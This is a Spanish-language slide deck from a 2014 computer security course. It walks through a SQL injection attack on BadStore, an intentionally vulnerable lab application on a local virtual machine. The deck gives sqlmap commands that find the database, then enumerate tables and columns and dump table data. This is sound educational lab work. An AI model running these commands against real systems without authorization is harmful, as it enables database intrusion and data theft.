ataque por inyección de código sql

8
Especialización en Seguridad Informática Ataque por inyección de código SQL, JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014

Upload: jose-alfredo-ramirez-prada

Post on 26-Jun-2015

139 views

Category:

Technology


0 download

DESCRIPTION

Ataque realizado a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.

TRANSCRIPT

Page 1: Ataque por inyección de código sql

Especialización en Seguridad Informática

Ataque por inyección de código SQL,

JOSÉ ALFREDO RAMÍREZ PRADA

Espinal, Septiembre de 2014

Page 2: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

Una vez instalada la máquina virtual se procede a la configuración para instalar BadStore, se instala la aplicación Python 2.7.8.

Page 3: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

una vez iniciada la maquina virtual "BADSTORE", por medio del comando IFCONFIG, obtenemos la dirección IP (192.168.56.101) a la cual acceder desde nuestro explorador, con el fin de identificar las vulnerabilidades de Sql Injections, por ejemplo se introduce una comilla en el campo “Search” del formulario "What´s New", y observamos un mensaje de error SQL.

Page 4: Ataque por inyección de código sql

Ataque a la base de datos de BadstoreIdentificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:\sqlmap

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" --current-db

Se confirma la vulnerabilidad  y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 4 y el servidor Web Apache 1.3.28, el nombre de la base de datos 'BADSTOREDB'.

Page 5: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb --tables

Page 6: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

una vez identificada la tabla (itemdb) podremos identificar información de las columnas y de los campos, correspondientemente con los siguientes comandos:

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb --columns

sqlmap.py -u "http://192.168.56.101/cgi-bin/badstore.cgi?searchquery=%22&action=search&x=0&y=0" -D  badstoredb -T itemdb -C ldesc --dump

Page 7: Ataque por inyección de código sql

Ataque a la base de datos de Badstore

De esta forma obtenemos toda la información sobre la base de datos de Badstore.

Page 8: Ataque por inyección de código sql

Especialización en Seguridad Informática

GRACIAS POR SU ATENCIÓN